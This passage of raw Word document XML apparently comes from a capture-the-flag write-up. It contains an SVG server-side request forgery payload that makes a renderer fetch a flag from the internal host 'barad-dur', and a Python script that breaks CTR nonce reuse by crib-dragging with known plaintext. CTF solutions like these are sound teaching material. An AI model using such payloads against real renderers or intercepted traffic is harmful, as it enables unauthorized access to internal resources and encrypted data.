      </w:pPr>
      <w:r w:rsidRPr="00856780">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55EF280B" wp14:editId="0D18E3E4">
            <wp:extent cx="3953427" cy="6487430"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="18339694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942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70B8" w14:textId="16FF3BFD" w:rsidR="00856780" w:rsidRPr="00856780" w:rsidRDefault="00856780" w:rsidP="00856780">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00856780">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58AD172D" wp14:editId="6C50EDDB">
            <wp:extent cx="3962953" cy="4801270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15664134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3454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A647" w14:textId="275E73A6" w:rsidR="001C5089" w:rsidRDefault="00EC4827" w:rsidP="004C69B3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc213279049"/>
      <w:r w:rsidRPr="00EC4827">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web 300-2 The Shape of Water</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="5B22C73E" w14:textId="5B45E307" w:rsidR="00EC4827" w:rsidRDefault="00EC4827" w:rsidP="00EC4827">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC4827">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23236F97" wp14:editId="4B7EBC40">
            <wp:extent cx="3991532" cy="6439799"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="7209792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9287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03DD" w14:textId="04E5E282" w:rsidR="00100358" w:rsidRDefault="00D80E97" w:rsidP="00100358">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc213279050"/>
      <w:r w:rsidRPr="00D80E97">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web 400 Mouth of Sauron</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="1AAA093D" w14:textId="2476C026" w:rsidR="00100358" w:rsidRDefault="00100358" w:rsidP="00100358">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AB643C6" wp14:editId="23434BE9">
            <wp:extent cx="3181794" cy="733527"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="61826105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61050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742C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10035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&lt;!-- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>palantir-ssrf.svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0010035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--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F9A18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2. &lt;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svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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xmlns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"http://www.w3.org/2000/svg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3769F4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xmlns:xlink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"http://www.w3.org/1999/xlink"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E88A4F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r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width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"900"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height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"600"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viewBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"0 0 900 600"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310EDC48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100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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defs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222578FF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6.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00358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;filter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id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"f"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x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y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width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"900"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height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"600"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filterUnits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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userSpaceOnUse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F8304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r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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feImage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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x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y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width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"900"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height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"600"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71E2A9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preserveAspectRatio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"none"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08111556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xlink:href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"http://barad-dur:31337/flag.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126C309A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href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"http://barad-dur:31337/flag.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B914BCD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r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>result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img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7015D8BA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r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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feComposite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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in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img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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in2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SourceGraphic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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operator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"over"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11284EEF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00358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268E7F0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100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/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defs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96B61C" w14:textId="77777777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 w:rsidRPr="00100358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100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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rect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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x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y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width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"900"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height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"600"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fill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"white"</w:t>
      </w:r>
      <w:r w:rsidRPr="0010035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00358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r w:rsidRPr="0010035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00358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100358">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(#f)"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7DAC02" w14:textId="2040974D" w:rsidR="00100358" w:rsidRPr="00100358" w:rsidRDefault="001003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80446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>16. &lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>svg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1FF8B4F8" w14:textId="452F4F4F" w:rsidR="00100358" w:rsidRDefault="00100358" w:rsidP="00100358">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4263D5ED" w14:textId="77777777" w:rsidR="002460A7" w:rsidRDefault="002460A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc213279051"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D971B4E" w14:textId="3826C517" w:rsidR="006F4DED" w:rsidRDefault="006F4DED" w:rsidP="006F4DED">
      <w:pPr>
        <w:pStyle w:val="Heading2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lastRenderedPageBreak/>
        <w:t>Crypto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="18FF5C8D" w14:textId="77777777" w:rsidR="006F4DED" w:rsidRPr="006840C5" w:rsidRDefault="006F4DED" w:rsidP="006F4DED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA651A5" w14:textId="78CD2DBF" w:rsidR="006F4DED" w:rsidRPr="006F4DED" w:rsidRDefault="006F4DED" w:rsidP="006F4DED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc213279052"/>
      <w:r w:rsidRPr="006F4DED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Crypto 200-1 Two Wrongs Make </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F4DED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a Right</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6E76600B" w14:textId="2FC25E72" w:rsidR="006F4DED" w:rsidRDefault="006F4DED" w:rsidP="006F4DED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4DED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EAE1135" wp14:editId="7FD8E3CF">
            <wp:extent cx="3305636" cy="714475"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="493940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023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865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binascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CC831A7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472587AB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D28736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Known </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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plaintext</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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of C1 (from the challenge description)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7899DF28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c1_plaintext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"""From: Tamsin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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To</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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: Mason Date: Sat, 11 Oct 2025 10:02:05 -0500 Subject: System checks and handoff plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4212F8BE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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD6A8F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Hey—quick handoff notes before I go off-grid: • Rotate the service tokens on barad-dur first, then </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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traefik</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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. • The staging login banner still shows "</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2024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"; fix that. • If anyone pings you about CRYP 200-1, tell them it's not a padding-oracle. • Also: the validator only accepts lowercase flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054DF27A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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5BF5FC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Final reminder: never ship secrets in plaintext. Use proper key management and never reuse a CTR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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nonce</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F878D9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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B40EE6D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—T """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6507C461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605B5F2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Read the ciphertexts from files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5421F6A8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with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open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'c1.hex'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'r'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file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6005AAE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c1_hex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read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strip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46A3A246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with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open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'c2.hex'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'r'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file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E9521D6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c2_hex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read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strip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0A3FD062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D29F793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Convert the hex to bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B902D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c1_bytes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binascii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unhexlify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c1_hex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CA6FD03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c2_bytes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binascii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unhexlify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c2_hex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D456729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A93482A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XOR the two ciphertexts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F445CE8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24.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xor_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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b1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b2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b1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b2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zip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c1_bytes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c2_bytes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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAD0E77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610D16E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Convert the known plaintext to bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F5FDE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c1_plaintext_bytes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c1_plaintext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'utf-8'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04DD20A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47FB65B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Try crib-dragging to find the flag in P2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52838A0A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p2_possibilities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1B537854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xor_result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c1_plaintext_bytes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6C3BE80F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aligned_xor_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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xor_result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start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start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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len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c1_plaintext_bytes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</w:p>
    <w:p w14:paraId="51427478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XOR the aligned result with the known plaintext (C1) to extract part of P2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B0485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possible_p2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bytes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b1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b2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b1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b2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zip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aligned_xor_result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c1_plaintext_bytes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)])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736955DA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2B0F8FFF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Decode and check for flag-like text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F13F099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decoded_possible_p2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possible_p2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decode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'utf-8'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errors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'ignore'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B01D196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flag_match</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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re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search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r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'poctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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\{.*?\}'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decoded_possible_p2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FD21D37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flag_match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AB7A9E3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p2_possibilities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flag_match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group</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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12FD3A51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7B2E888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6F4DED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Print any found flag possibilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F583D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p2_possibilities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738E3CB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"Found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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flag: {p2_possibilities[0]}"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C87AF19" w14:textId="77777777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B09E854" w14:textId="48891FFE" w:rsidR="006F4DED" w:rsidRPr="006F4DED" w:rsidRDefault="006F4D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255605"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F4DED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">46. </w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE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F4DED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F4DED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"No flag found."</w:t>
      </w:r>
      <w:r w:rsidRPr="006F4DE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1B361FD" w14:textId="73D70C89" w:rsidR="006F4DED" w:rsidRPr="002460A7" w:rsidRDefault="006F4DED" w:rsidP="006F4DED"/>
    <w:sectPr w:rsidR="006F4DED" w:rsidRPr="002460A7">
      <w:footerReference w:type="default" r:id="rId3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A1A8D" w14:textId="77777777" w:rsidR="00E0226B" w:rsidRDefault="00E0226B" w:rsidP="00A16F3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="20D682F7" w14:textId="77777777" w:rsidR="00E0226B" w:rsidRDefault="00E0226B" w:rsidP="00A16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5891593"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="62595E01" w14:textId="324FDFB3" w:rsidR="00A16F3C" w:rsidRDefault="00A16F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05B2318" w14:textId="77777777" w:rsidR="00A16F3C" w:rsidRDefault="00A16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94B6" w14:textId="77777777" w:rsidR="00E0226B" w:rsidRDefault="00E0226B" w:rsidP="00A16F3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2267A67A" w14:textId="77777777" w:rsidR="00E0226B" w:rsidRDefault="00E0226B" w:rsidP="00A16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7342F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1024AD0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2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A0"/>
    <w:rsid w:val="00025A1E"/>
    <w:rsid w:val="00042C6D"/>
    <w:rsid w:val="00086989"/>
    <w:rsid w:val="00095959"/>
    <w:rsid w:val="000A3088"/>
    <w:rsid w:val="000B4275"/>
    <w:rsid w:val="000E1C99"/>
    <w:rsid w:val="000E7944"/>
    <w:rsid w:val="000F750A"/>
    <w:rsid w:val="000F7652"/>
    <w:rsid w:val="00100358"/>
    <w:rsid w:val="00132EF1"/>
    <w:rsid w:val="0013654D"/>
    <w:rsid w:val="00160418"/>
    <w:rsid w:val="0017226C"/>
    <w:rsid w:val="001747B1"/>
    <w:rsid w:val="0018145A"/>
    <w:rsid w:val="001C5089"/>
    <w:rsid w:val="001C5997"/>
    <w:rsid w:val="001E46EE"/>
    <w:rsid w:val="00215AD0"/>
    <w:rsid w:val="00220FAF"/>
    <w:rsid w:val="00221125"/>
    <w:rsid w:val="002324D7"/>
    <w:rsid w:val="00243F90"/>
    <w:rsid w:val="002460A7"/>
    <w:rsid w:val="00274D1D"/>
    <w:rsid w:val="00277289"/>
    <w:rsid w:val="00291DF3"/>
    <w:rsid w:val="002A437D"/>
    <w:rsid w:val="002B2713"/>
    <w:rsid w:val="002D099B"/>
    <w:rsid w:val="002E1E37"/>
    <w:rsid w:val="002F6523"/>
    <w:rsid w:val="002F7D37"/>
    <w:rsid w:val="003208DB"/>
    <w:rsid w:val="00361DEA"/>
    <w:rsid w:val="003651A1"/>
    <w:rsid w:val="003A6BE3"/>
    <w:rsid w:val="003B1F95"/>
    <w:rsid w:val="003B42FC"/>
    <w:rsid w:val="003C0D73"/>
    <w:rsid w:val="00417142"/>
    <w:rsid w:val="004175C0"/>
    <w:rsid w:val="00420F0D"/>
    <w:rsid w:val="0042502E"/>
    <w:rsid w:val="00430F6F"/>
    <w:rsid w:val="00490371"/>
    <w:rsid w:val="00492779"/>
    <w:rsid w:val="00493DB6"/>
    <w:rsid w:val="004C0618"/>
    <w:rsid w:val="004C69B3"/>
    <w:rsid w:val="004E418B"/>
    <w:rsid w:val="005007A3"/>
    <w:rsid w:val="005033A0"/>
    <w:rsid w:val="00505C3F"/>
    <w:rsid w:val="0054022A"/>
    <w:rsid w:val="00544317"/>
    <w:rsid w:val="00577526"/>
    <w:rsid w:val="005838A0"/>
    <w:rsid w:val="00595F42"/>
    <w:rsid w:val="005B371C"/>
    <w:rsid w:val="005B7359"/>
    <w:rsid w:val="00600DB1"/>
    <w:rsid w:val="00613932"/>
    <w:rsid w:val="00617944"/>
    <w:rsid w:val="00627824"/>
    <w:rsid w:val="00634119"/>
    <w:rsid w:val="0065392B"/>
    <w:rsid w:val="006840C5"/>
    <w:rsid w:val="0069368D"/>
    <w:rsid w:val="0069590F"/>
    <w:rsid w:val="006A2719"/>
    <w:rsid w:val="006F4DED"/>
    <w:rsid w:val="00714F3A"/>
    <w:rsid w:val="0071588B"/>
    <w:rsid w:val="007205E6"/>
    <w:rsid w:val="00731BDF"/>
    <w:rsid w:val="007C665B"/>
    <w:rsid w:val="007D77C4"/>
    <w:rsid w:val="007E13A5"/>
    <w:rsid w:val="007E514C"/>
    <w:rsid w:val="007F2370"/>
    <w:rsid w:val="0082512F"/>
    <w:rsid w:val="0084646D"/>
    <w:rsid w:val="00856780"/>
    <w:rsid w:val="00856A71"/>
    <w:rsid w:val="0088214D"/>
    <w:rsid w:val="008C03D5"/>
    <w:rsid w:val="008C41E7"/>
    <w:rsid w:val="009063AE"/>
    <w:rsid w:val="009166C5"/>
    <w:rsid w:val="009360FF"/>
    <w:rsid w:val="00960686"/>
    <w:rsid w:val="009617B5"/>
    <w:rsid w:val="00964E9C"/>
    <w:rsid w:val="00972C42"/>
    <w:rsid w:val="00977B52"/>
    <w:rsid w:val="009A53A7"/>
    <w:rsid w:val="00A12ACD"/>
    <w:rsid w:val="00A14B8B"/>
    <w:rsid w:val="00A16F3C"/>
    <w:rsid w:val="00A513EE"/>
    <w:rsid w:val="00A52886"/>
    <w:rsid w:val="00A643FC"/>
    <w:rsid w:val="00A81F26"/>
    <w:rsid w:val="00A96003"/>
    <w:rsid w:val="00AA3958"/>
    <w:rsid w:val="00AD58A6"/>
    <w:rsid w:val="00AE657E"/>
    <w:rsid w:val="00B07505"/>
    <w:rsid w:val="00B32B09"/>
    <w:rsid w:val="00BB148F"/>
    <w:rsid w:val="00BB4E17"/>
    <w:rsid w:val="00BC5416"/>
    <w:rsid w:val="00BE7EAD"/>
    <w:rsid w:val="00BF377F"/>
    <w:rsid w:val="00C05876"/>
    <w:rsid w:val="00C3364E"/>
    <w:rsid w:val="00C8340C"/>
    <w:rsid w:val="00C96312"/>
    <w:rsid w:val="00CC1E57"/>
    <w:rsid w:val="00CD0C20"/>
    <w:rsid w:val="00CD1B19"/>
    <w:rsid w:val="00CF6BFF"/>
    <w:rsid w:val="00D12FD7"/>
    <w:rsid w:val="00D227D7"/>
    <w:rsid w:val="00D31FC9"/>
    <w:rsid w:val="00D41266"/>
    <w:rsid w:val="00D41AAF"/>
    <w:rsid w:val="00D620EB"/>
    <w:rsid w:val="00D80E97"/>
    <w:rsid w:val="00D94A96"/>
    <w:rsid w:val="00DA5BB5"/>
    <w:rsid w:val="00DE3BFE"/>
    <w:rsid w:val="00DE6D71"/>
    <w:rsid w:val="00E0226B"/>
    <w:rsid w:val="00E20286"/>
    <w:rsid w:val="00E3169D"/>
    <w:rsid w:val="00E31C82"/>
    <w:rsid w:val="00E667AD"/>
    <w:rsid w:val="00E82065"/>
    <w:rsid w:val="00E86906"/>
    <w:rsid w:val="00E87E88"/>
    <w:rsid w:val="00EC4827"/>
    <w:rsid w:val="00ED207C"/>
    <w:rsid w:val="00F86CFF"/>
    <w:rsid w:val="00F87358"/>
    <w:rsid w:val="00FC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4A45"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80029E5E-6926-4EEC-97EB-1C316B39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D"/>
  </w:style>
